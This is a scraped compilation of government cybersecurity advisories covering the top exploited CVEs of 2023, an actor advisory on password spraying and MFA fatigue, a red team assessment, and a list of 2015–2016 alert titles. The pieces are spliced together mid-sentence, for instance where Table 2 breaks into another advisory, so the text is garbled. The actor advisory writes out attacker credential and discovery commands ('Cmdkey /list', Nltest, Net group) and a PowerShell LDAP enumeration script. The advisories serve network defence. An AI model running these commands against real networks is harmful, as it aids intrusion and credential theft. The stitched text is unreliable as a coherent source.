Malicious cyber actors continue to have the most success exploiting vulnerabilities within two years after public disclosure of the vulnerability. The utility of these vulnerabilities declines over time as more systems are patched or replaced. Malicious cyber actors find less utility from zero-day exploits when international cybersecurity efforts reduce the lifespan of zero-day vulnerabilities.

Cybersecurity Efforts to Include

Implementing security-centered product development lifecycles. Software developers deploying patches to fix software vulnerabilities is often a lengthy and expensive process, particularly for zero-days. The use of more robust testing environments and implementing threat modeling throughout the product development lifecycle will likely reduce overall product vulnerabilities.

Increasing incentives for responsible vulnerability disclosure. Global efforts to reduce barriers to responsible vulnerability disclosure could restrict the utility of zero-day exploits used by malicious cyber actors. For example, instituting vulnerability reporting bug bounty programs that allow researchers to receive compensation and recognition for their contributions to vulnerability research may boost disclosures.

Using sophisticated endpoint detection and response (EDR) tools. End users leveraging EDR solutions may improve the detection rate of zero-day exploits. Most zero-day exploits, including at least three of the top 15 vulnerabilities from last year, have been discovered when an end user or EDR system reports suspicious activity or unusual device malfunctions.

Top Routinely Exploited Vulnerabilities

Listed in Table 1 are the top 15 vulnerabilities the authoring agencies observed malicious cyber actors routinely exploiting in 2023 with details also discussed below.

CVE-2023-3519: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway.
- Allows an unauthenticated user to cause a stack buffer overflow in the NSPPE process by using a HTTP GET request.
CVE-2023-4966: This vulnerability affects Citrix NetScaler ADC and NetScaler Gateway.
- Allows session token leakage; a proof-of-concept for this exploit was revealed in October 2023.
CVE-2023-20198: This vulnerability affects Cisco IOS XE Web UI.
- Allows unauthorized users to gain initial access and issue a command to create a local user and password combination, resulting in the ability to log in with normal user access.
CVE-2023-20273: This vulnerability affects Cisco IOS XE, following activity from CVE-2023-20198.
- Allows privilege escalation, once a local user has been created, to root privileges.
CVE-2023-27997: This vulnerability affects Fortinet FortiOS and FortiProxy SSL-VPN.
- Allows a remote user to craft specific requests to execute arbitrary code or commands.
CVE-2023-34362: This vulnerability affects Progress MOVEit Transfer.
- Allows abuse of an SQL injection vulnerability to obtain a sysadmin API access token.
- Allows a malicious cyber actor to obtain remote code execution via this access by abusing a deserialization call.
CVE-2023-22515: This vulnerability affects Atlassian Confluence Data Center and Server.
- Allows exploit of an improper input validation issue.
  - Arbitrary HTTP parameters can be translated into getter/setter sequences via the XWorks2 middleware and, in turn, allow Java objects to be modified at run time.
  - The exploit creates a new administrator user and uploads a malicious plugin to get arbitrary code execution.
CVE-2021-44228: This vulnerability, known as Log4Shell, affects Apache’s Log4j library, an open source logging framework incorporated into thousands of products worldwide.
- Allows the execution of arbitrary code.
  - An actor can exploit this vulnerability by submitting a specially crafted request to a vulnerable system, causing the execution of arbitrary code.
  - The request allows a cyber actor to take full control of a system.
  - The actor can then steal information, launch ransomware, or conduct other malicious activity.
  - Malicious cyber actors began exploiting the vulnerability after it was publicly disclosed in December 2021.
CVE-2023-2868: This is a remote command injection vulnerability that affects the Barracuda Networks Email Security Gateway (ESG) Appliance.
- Allows an individual to obtain unauthorized access and remotely execute system commands via the ESG appliance.
CVE-2022-47966: This is an unauthenticated remote code execution vulnerability that affects multiple products using Zoho ManageEngine.
- Allows an unauthenticated user to execute arbitrary code by providing a crafted samlResponse XML to the ServiceDesk Plus SAML endpoint.
CVE-2023-27350: This vulnerability affects PaperCut MF/NG.
- Allows a malicious cyber actor to chain an authentication bypass vulnerability with the abuse of built-in scripting functionality to execute code.
CVE-2020-1472: This vulnerability affects Microsoft Netlogon.
- Allows privilege escalation.
  - An unauthorized user may use non-default configurations to establish a vulnerable Netlogon secure channel connection to a domain controller by using the Netlogon Remote Protocol.
    Note: This CVE has been included in top routinely exploited vulnerabilities lists since 2021.
CVE-2023-42793: This vulnerability can affect JetBrains TeamCity servers.
- Allows authentication bypass that allows remote code execution against vulnerable JetBrains TeamCity servers.
CVE-2023-23397: This vulnerability affects Microsoft Office Outlook.
- Allows elevation of privilege.
  - A threat actor can send a specially crafted email that the Outlook client will automatically trigger when Outlook processes it.
  - This exploit occurs even without user interaction.
CVE-2023-49103: This vulnerability affects ownCloud graphapi.
- Allows unauthenticated information disclosure.
  - An unauthenticated user can access sensitive data such as admin passwords, mail server credentials, and license keys.

*Table 1: Top 15 Routinely Exploited Vulnerabilities in 2023*
CVE	Vendor	Product(s)	Vulnerability Type	CWE
CVE-2023-3519	Citrix	NetScaler ADC NetScaler Gateway	Code Injection	CWE-94: Improper Control of Generation of Code ('Code Injection')
CVE-2023-4966	Citrix	NetScaler ADC NetScaler Gateway	Buffer Overflow	CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer
CVE-2023-20198	Cisco	IOS XE Web UI	Privilege Escalation	CWE-420: Unprotected Alternate Channel
CVE-2023-20273	Cisco	IOS XE	Web UI Command Injection	CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVE-2023-27997	Fortinet	FortiOS FortiProxy SSL-VPN	Heap-Based Buffer Overflow	CWE-787: Out-of-bounds Write CWE-122: Heap-based Buffer Overflow
CVE-2023-34362	Progress	MOVEit Transfer	SQL Injection	CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
CVE-2023-22515	Atlassian	Confluence Data Center and Server	Broken Access Control	CWE-20 Improper Input Validation
CVE-2021- 44228 (Log4Shell)	Apache	Log4j2	Remote Code Execution (RCE)	CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') CWE-502: Deserialization of Untrusted Data CWE-20 Improper Input Validation CWE-400 Uncontrolled Resource Consumption
CVE-2023-2868	Barracuda Networks	ESG Appliance	Improper Input Validation	CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') CWE-20: Improper Input Validation
CVE-2022-47966	Zoho	ManageEngine Multiple Products	Remote Code Execution	CWE-20 Improper Input Validation
CVE-2023-27350	PaperCut	MF/NG	Improper Access Control	CWE-284: Improper Access Control
CVE-2020-1472	Microsoft	Netlogon	Privilege Escalation	CWE-330: Use of Insufficiently Random Values
CVE-2023-42793	JetBrains	TeamCity	Authentication Bypass	CWE-288: Authentication Bypass Using an Alternate Path or Channel
CVE-2023-23397	Microsoft	Office Outlook	Privilege Escalation	CWE-294: Authentication Bypass by Capture-replay CWE-20: Improper Input Validation
CVE-2023-49103	ownCloud	graphapi	Information Disclosure	CWE-200 Exposure of Sensitive Information to an Unauthorized Actor

Additional Routinely Exploited Vulnerabilities

The authoring agencies identified other vulnerabilities, listed in Table 2, that malicious cyber actors also routinely exploited in 2023—in addition to the 15 vulnerabilities listed in Table 1.

*Table 2: Additional Routinely Exploited Vulnerabilities in 2023*
CVE	Vendor	Product	Vulnerability Type	CWE
CVE-2023-22518	Atlassian	Confluence Data Center and Server	Improper Authorization	CWE-863: Incorrect Authorization
CVE-2023- 29492	Novi	Novi Survey	Insecure Deserialization	MITRE ATT&CK^® for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section in Appendix A for a table of the actors’ activity mapped to MITRE ATT&CK tactics and techniques. Overview of Activity The actors likely conduct reconnaissance operations to gather victim identity [T1589] information. Once obtained, the actors gain persistent access to victim networks frequently via brute force [T1110]. After gaining access, the actors use a variety of techniques to further gather credentials, escalate privileges, and gain information about the entity’s systems and network. The actors also move laterally and download information that could assist other actors with access and exploitation. Initial Access and Persistence The actors use valid user and group email accounts [T1078], frequently obtained via brute force such as password spraying [T1110.003] although other times via unknown methods, to obtain initial access to Microsoft 365, Azure [T1078.004], and Citrix systems [T1133]. In some cases where push notification-based MFA was enabled, the actors send MFA requests to legitimate users seeking acceptance of the request. This technique—bombarding users with mobile phone push notifications until the user either approves the request by accident or stops the notifications— is known as “MFA fatigue” or “push bombing” [T1621]. Once the threat actors gain access to an account, they frequently register their devices with MFA to protect their access to the environment via the valid account: In two confirmed compromises, the actors leveraged a compromised user’s open registration for MFA [T1556.006] to register the actor’s own device [T1098.005] to access the environment. In another confirmed compromise, the actors used a self-service password reset (SSPR) tool associated with a public facing Active Directory Federation Service (ADFS) to reset the accounts with expired passwords [T1484.002] and then registered MFA through Okta for compromised accounts without MFA already enabled [T1556] [T1556.006]. The actors frequently conduct their activity using a virtual private network (VPN) service [T1572]. Several of the IP addresses in the actors’ malicious activity originate from exit nodes tied to the Private Internet Access VPN service. Lateral Movement The actors use Remote Desktop Protocol (RDP) for lateral movement [T1021.001]. In one instance, the actors used Microsoft Word to open PowerShell to launch the RDP binary `mstsc.exe` [T1202]. Credential Access The actors likely use open-source tools and methodologies to gather more credentials. The actors performed Kerberos Service Principal Name (SPN) enumeration of several service accounts and received Kerberos tickets [T1558.003]. In one instance, the actors used the Active Directory (AD) Microsoft Graph Application Program Interface (API) PowerShell application likely to perform a directory dump of all AD accounts. Also, the actors imported the tool [T1105] `DomainPasswordSpray.ps1`, which is openly available on GitHub [T1588.002], likely to conduct password spraying. The actors also used the command `Cmdkey /list`, likely to display usernames and credentials [T1555]. Privilege Escalation In one instance, the actors attempted impersonation of the domain controller, likely by exploiting Microsoft’s Netlogon (also known as ”Zerologon”) privilege escalation vulnerability (CVE-2020-1472) [T1068]. Discovery The actors leverage living off the land (LOTL) to gain knowledge about the target systems and internal networks. The actors used the following Windows command-line tools to gather information about domain controllers [T1018], trusted domains [T1482], lists of domain administrators, and enterprise administrators [T1087.002] [T1069.002] [T1069.003]: `Nltest /dclist` `Nltest /domain_trusts` `Nltest /domain_trusts/all_trusts` `Net group “Enterprise admins” /domain` `Net group “Domain admins” /domain` Next, the actors used the following Lightweight Directory Access Protocol (LDAP) query in PowerShell [T1059.001]to search the AD for computer display names, operating systems, descriptions, and distinguished names [T1082]. `$i=0` `$D= [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()` `$L='LDAP://' . $D` `$D = [ADSI]$L` `$Date = $((Get-Date).AddDays(-90).ToFileTime())` `$str = '(&(objectcategory=computer)(operatingSystem=serv)(\|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))'` `$s = [adsisearcher]$str` `$s.searchRoot = $L.$D.distinguishedName` `$s.PropertiesToLoad.Add('cn') > $Null` `$s.PropertiesToLoad.Add('operatingsystem') > $Null` `$s.PropertiesToLoad.Add('description') > $Null` `$s.PropertiesToLoad.Add('distinguishedName') > $Null` `Foreach ($CA in $s.FindAll()) {` `Write-Host $CA.Properties.Item('cn')` `$CA.Properties.Item('operatingsystem')` `$CA. Properties.Item('description')` `$CA.Properties.Item('distinguishedName')` `$i++` `}` `Write-host Total servers: $i` Command and Control On one occasion, using msedge.exe, the actors likely made outbound connections to Cobalt Strike Beacon command and control (C2) infrastructure [T1071.001]. Exfiltration and Collection In a couple instances, while logged in to victim accounts, the actors downloaded files related to gaining remote access to the organization and to the organization’s inventory [T1005], likely exfiltrating the files to further persist in the victim network or to sell the information online. Detection To detect brute force activity, the authoring agencies recommend reviewing authentication logs for system and application login failures of valid accounts and looking for multiple, failed authentication attempts across all accounts. To detect the use of compromised credentials in combination with virtual infrastructure, the authoring agencies recommend the following steps: Look for “impossible logins,” such as suspicious logins with changing usernames, user agent strings, and IP address combinations or logins where IP addresses do not align to the user’s expected geographic location. Look for one IP used for multiple accounts, excluding expected logins. Look for “impossible travel.” Impossible travel occurs when a user logs in from multiple IP addresses with significant geographic distance (i.e., a person could not realistically travel between the geographic locations of the two IP addresses during the period between the logins). Note: Implementing this detection opportunity can result in false positives if legitimate users apply VPN solutions before connecting into networks. Look for MFA registrations with MFA in unexpected locales or from unfamiliar devices. Look for processes and program execution command-line arguments that may indicate credential dumping, especially attempts to access or copy the `ntds.dit` file from a domain controller. Look for suspicious privileged account use after resetting passwords or applying user account mitigations. Look for unusual activity in typically dormant accounts. Look for unusual user agent strings, such as strings not typically associated with normal user activity, which may indicate bot activity. Mitigations The authoring agencies recommend organizations implement the mitigations below to improve organizations’ cybersecurity posture based on the actors’ TTPs described in this advisory. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA. The CPGs, which are organized to align to the National Institute of Standards and Technology (NIST) Cybersecurity Framework, are a subset of cybersecurity practices, aimed at meaningfully reducing risks to both critical infrastructure operations and the American people. These voluntary CPGs strive to help small- and medium-sized organizations kick-start their cybersecurity efforts by prioritizing investment in a limited number of essential actions with high-impact security outcomes. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections. Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy for user verification or password strength, creating a security gap. Avoid common passwords (e.g. “Spring2024” or “Password123!”). Disable user accounts and access to organizational resources for departing staff [CPG 2.D]. Disabling accounts can minimize system exposure, removing options actors can leverage for entry into the system. Similarly, create new user accounts as close as possible to an employee’s start date. Implement phishing-resistant MFA [CPG 2.H]. See CISA’s resources Phishing-Resistant Multifactor Authentication and More than a Password for additional information on strengthening user credentials. Continuously review MFA settings to ensure coverage over all active, internet-facing protocols to ensure no exploitable services are exposed [Secure by Design principles and implement the recommendations in the Mitigations section of this advisory, including those listed below: Embed security into product architecture throughout the entire software development lifecycle (SDLC). Eliminate default passwords. Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature. Download the PDF version of this report: AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization (PDF, 823.56 KB ) INTRODUCTION CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period. During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology. Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise. TECHNICAL DETAILS Note: This advisory uses the MITRE ATT&CK^® Matrix for Enterprise framework, version 16. See Appendix: MITRE ATT&CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&CK tactics and techniques. Phase I: Red Team Cyber Threat Activity Overview The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [T1590], defensive tools [T1590.006], and employees [T1589.003]. The red team designed spearphishing campaigns [T1566] tailored to employees most likely to communicate with external parties. The phishing attempts were ultimately unsuccessful—targets ran the payloads [T1204], but their execution did not result in the red team gaining access into the network. After the failed spearphishing campaigns, the red team continued external reconnaissance of the network [T1595] and discovered a web shell [T1505.003] left from a previous Vulnerability Disclosure Program (VDP). The red team used this for initial access [TA0001] and immediately reported it to the organization’s trusted agents (TAs). The red team leveraged that access to escalate privileges [TA0004] on the host, discover credential material on a misconfigured Network File System (NFS) share [T1552.001], and move from a DMZ to the internal network [TA0008]. With access to the internal network, the red team gained further access to several SBSs. The red team leveraged a certificate for client authentication [T1649] they discovered on the NFS share to compromise a system configured for Unconstrained Delegation. This allowed the red team to acquire a ticket granting ticket (TGT) for a domain controller [T1558.001], used to further compromise the domain. The red team leveraged this level of access to exploit SBS targets provided by the organization’s TAs. The assessed organization detected much of the red team’s activity in their Linux infrastructure after CISA alerted them via other channels to the vulnerability the red team used for initial access. Once given an official notification of a vulnerability, the organization’s network defenders began mitigating the vulnerability. Network defenders removed the site hosting the web shell from the public internet but did not take the server itself offline. A week later, network defenders officially declared an incident once they determined the web shell was used to breach the internal network. For several weeks, network defenders terminated much of the red team’s access until the team maintained implants on only four hosts. Network defenders successfully delayed the red team from accessing many SBSs that required additional positioning, forcing the red team to spend time refortifying their access in the network. Despite these actions, the red team was still able to access a subset of SBSs. Eventually, the red team and TAs decided that the network defenders would stand down to allow the red team to continue its operations in a monitoring mode. In monitoring mode, network defenders would report what they observed of the red team’s access, but not continue to block and terminate it. See Figure 1 for a timeline of the red team’s activity with key points access. See the following sections for additional details, including the red team’s TTPs. Figure 1: Timeline of Red Team Cyber Threat Activity Initial Access Following an unsuccessful spearphishing campaign, the red team gained initial access to the target by exploiting an internet-facing Linux web server [T1190] discovered through reconnaissance [TA0043] of the organization’s external internet protocol (IP) space [T1590.005]. The red team first conducted open source research [T1593] to identify information about the organization’s network including the tools used to protect the network and potential targets for spearphishing. The red team looked for email addresses [T1589.002] and names to infer email addresses from the organization’s email syntax (discovered during reconnaissance). Following, the red team sent tailored spearphishing emails to 13 targets [T1566.002]. Of these 13 targets, one user responded and executed two malicious payloads [T1204.002]. However, the payloads failed to bypass a previously undiscovered technical control employed by the victim organization, which prevented the red team’s first attempt to gain initial access. To find an alternate pathway for initial access, the red team conducted reconnaissance with several publicly available tools, such as Shodan and Censys, to discover accessible devices and services on the internet [T1596.005]. The red team identified an old and unpatched service with a known XML External Entity (XXE) vulnerability and leveraged a public proof of concept to deploy a web shell. The associated product had an exposed endpoint—one that system administrators should typically block from the public internet—that allowed the red team to discover a preexisting web shell on the organization’s Linux web server. The preexisting web shell allowed the red team to run arbitrary commands on the server [T1059] as a user (WEBUSER1). Using the web shell, the red team identified an open internal proxy server [T1016] to send outbound communications to the internet via Hypertext Transfer Protocol Secure (HTTPS). The red team then downloaded [T1105] and executed a Sliver payload that utilized this proxy to establish command and control (C2) over this host, calling back to their infrastructure [TA0011]. Note: Because the web shell and unpatched vulnerability allowed actors to easily gain initial access to the organization, the CISA red team determined this was a critical vulnerability. CISA reported both the vulnerability and the web shell to the organization in an official vulnerability notification so the organization could remediate both issues. Following this notification, the victim organization initiated threat hunting activities, detecting some of the red team’s activity. The TAs determined that network defenders had previously identified and reported the vulnerability but did not remediate it. Further, the TAs found that network defenders were unaware of the web shell and believed it was likely leftover from prior VDP activity. See the Defense Evasion and Victim Network Defense Activities section for more information. Linux Infrastructure Compromise Local Privilege Escalation and Credential Access The red team then moved laterally from the web server to the organization’s internal network using valid accounts [T1078] as the DMZ was not properly segmented from the organization’s internal domain. The red team acquired credentials [TA0006] by first escalating privileges on the web server. The team discovered that WEBUSER1 had excessive `sudo` rights, allowing them to run some commands as root commands without a password. They used these elevated rights to deploy a new callback with root access [T1548.003]. With root access to the web server, the team had full access to the organization’s directories and files on a NFS share with `no_root_squash` enabled. If `no_root_squash` is used, remote root users can read and change any file on the shared file system and leave a trojan horse [T1080] for other users to inadvertently execute. On Linux operating systems this option is disabled by default, yet the organization enabled it to accommodate several legacy systems. The organization’s decision to enable the `no_root_squash` option allowed the red team to read all the files on the NFS share once it escalated its privileges on a single host with the NFS share mounted. This NFS share hosted the home directories of hundreds of Linux users—many of which had privileged access to one or more servers—and was auto-mounted when those users logged into Linux hosts in the environment. The red team used its escalated privileges to search for private certificate files, Secure Shell (SSH) private keys, passwords, bash command histories [T1552.003], and other sensitive data across all user files on the NFS share [T1039]. The team initially obtained 61 private SSH keys [T1552.004] and a file containing valid cleartext domain credentials (DOMAINUSER1) that the team used to authenticate to the organization’s domain [T1078.002]. Linux Command and Control In the organization’s Linux environment, the red team leveraged HTTPS connections for C2 [T1071.001]. Most of the Linux systems could not directly access the internet, but the red team circumvented this by leveraging an open internal HTTPS proxy [T1090.001] for their traffic. Lateral Movement and Persistence The red team’s acquisition of SSH private keys generated for user and service accounts facilitated unrestricted lateral movement to other Linux hosts [T1021.004]. This acquisition included two highly privileged accounts with root access to hundreds of servers. Within one week of initial access, the team moved to multiple Linux servers and established persistence [TA0003] on four. The team used a different persistence mechanism on each Linux host, so network defenders would be less likely to discover the red team’s presence on all four hosts. The team temporarily backdoored several scripts run at boot time to maintain persistence [T1037], ensuring the original versions of the scripts were re-enabled once the team successfully achieved persistence. Some of the team’s techniques included modifying preexisting scripts run by the `cron` utility [T1053.003] and `ifup-post` scripts [T1037.003]. Of note, the team gained root access to an SBS-adjacent infrastructure management server that ran Ansible Tower. Access to this Ansible Tower system [T1072] provided easy access to multiple SBSs. The team discovered a root SSH private key on the host, which allowed the team to move to six SBSs across six different sensitive IP ranges. A week after the team provided screenshots of root access to the SBSs to the TAs, the TAs deconflicted the red team’s access to the Ansible Tower system that network defenders discovered. The organization detected the compromise by observing abnormal usage of the root SSH private key. The root SSH private key was used to log into multiple hosts at times and for durations outside of preestablished baselines. In a real compromise, the organization would have had to shut down the server, significantly impacting business operations. Windows Domain Controller Compromise Approximately two weeks after gaining initial access, the red team compromised a Windows domain controller. This compromise allowed the team to move laterally to all domain-joined Windows hosts within the organization. To first gain situational awareness about the organization’s environment, the red team exfiltrated Activ Multiple Vulnerabilities in Mozilla Firefox Could Allow for Arbitrary Code Execution Wed, 27 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Magento eCommerce Platform Could Allow Remote Code Execution Tue, 26 Jan 2016 05:00:00 +0000 ... Vulnerability in AMX Harman Professional Devices Could Allow Unauthorized Remote Access Mon, 25 Jan 2016 05:00:00 +0000 ... Vulnerability in Fortinet FortiOS Could Allow Unauthorized Remote Access Mon, 25 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in PHP Could Allow Arbitrary Code Execution Thu, 21 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Arbitrary Code Execution Wed, 20 Jan 2016 05:00:00 +0000 ... Oracle Quarterly Critical Patches Issued January 19, 2016 Tue, 19 Jan 2016 05:00:00 +0000 ... Vulnerability in Microsoft Silverlight Could Allow Remote Code Execution (MS16-006) Fri, 15 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Cisco Products Could Allow for Unauthenticated, Remote Access Thu, 14 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS16-004) Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Acrobat and Adobe Reader Could Allow for Remote Code Execution (APSB16-02) Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS16-007) Tue, 12 Jan 2016 05:00:00 +0000 ... Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (MS16-005) Tue, 12 Jan 2016 05:00:00 +0000 ... A Vulnerability in VBScript Scripting Engine Could Allow for Remote Code Execution (MS16-003) Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS16-002) Tue, 12 Jan 2016 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS16-001) Tue, 12 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Apple QuickTime Could Allow Arbitrary Code Execution Fri, 08 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Google Android Could Allow for Remote Code Execution Tue, 05 Jan 2016 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player and AIR Could Allow Remote Code Execution (APSB16-01) Mon, 28 Dec 2015 05:00:00 +0000 ... Multiple vulnerabilities in Joomla Could Allow Arbitrary Code Execution Wed, 23 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Juniper ScreenOS Could Allow Unauthorized, Remote Access or Remote Code Execution Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in Apache Commons Collections Could Allow Arbitrary Code Execution Tue, 22 Dec 2015 05:00:00 +0000 ... Vulnerability in FireEye Products Could Allow for Remote Code Execution Thu, 17 Dec 2015 05:00:00 +0000 ... Vulnerability in Joomla Could Allow Remote Code Execution Tue, 15 Dec 2015 05:00:00 +0000 ... Vulnerability in Cisco Products Could Allow Remote Code Execution Tue, 15 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Apple Products Could Allow Remote Code Execution Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow Remote Code Execution (APSB15-32) Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Windows Media Center Could Allow Remote Code Execution (MS15-134) Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-131) Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft Uniscribe Could Allow Remote Code Execution (MS15-130) Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Silverlight Could Allow Remote Code Execution (MS15-129) Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code Execution (MS15-128) Tue, 08 Dec 2015 05:00:00 +0000 ... Vulnerability in Microsoft DNS Server Could Allow Remote Code Execution (MS15-127) Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-125) Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS15-124) Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow for Remote Code Execution (APSB15-28) Tue, 10 Nov 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-116) Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS15-115) Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerability in Microsoft Windows Journal Could Allow Remote Code Execution (MS15-114) Tue, 10 Nov 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-113) Tue, 10 Nov 2015 05:00:00 +0000 ...

CB Alerts

Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations

Summary

Technical Details

Overview

File Execution

C2 Instructions

1. Opcode 0 – Steal Data Generic

2. Opcode 1 – Steal Browser Data

3. Opcode 2 – Steal Browser Data (Mozilla)

4. Opcode 3 – Download a File

5. Take Screenshot

6. Delete Self

Host Modifications

Decrypted Strings

Indicators of Compromise

Russian GRU Targeting Western Logistics Entities and Technology Companies

Executive Summary

Introduction

Description of Targets

Initial Access TTPs

Credential Guessing/Brute Force

Spearphishing

CVE Usage

Post-Compromise TTPs

Fast Flux: A National Security Threat

Executive summary

Technical details

Single and double flux

Additional malicious uses

Detection techniques

Mitigations

All organizations

Network defenders

Conclusion

Works cited

Technical Details

Background

Initial Access

Discovery

Defense Evasion

Lateral Movement and Execution

Exfiltration and Encryption

Extortion

Indicators of Compromise

MITRE ATT&CK Tactics and Techniques

#StopRansomware: Ghost (Cring) Ransomware

Summary

Technical Details

Initial Access

Execution

Persistence

Privilege Escalation

Credential Access

Defense Evasion

Discovery

Lateral Movement

Exfiltration

Command and Control

Impact and Encryption

Indicators of Compromise (IOC)

Ransom Email Addresses

Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications

Summary

Technical Details

Exploit Chain 1

Lateral Movement

Exploit Chain 2

Detection of Activity

Victim Organization 1

Victim Organization 2

Victim Organization 3

Indicators of Compromise

2023 Top Routinely Exploited Vulnerabilities

Summary

Purpose

Technical Details

Key Findings

Cybersecurity Efforts to Include

Additional Routinely Exploited Vulnerabilities

1. Opcode `0` – Steal Data Generic

2. Opcode `1` – Steal Browser Data

3. Opcode `2` – Steal Browser Data (Mozilla)

4. Opcode `3` – Download a File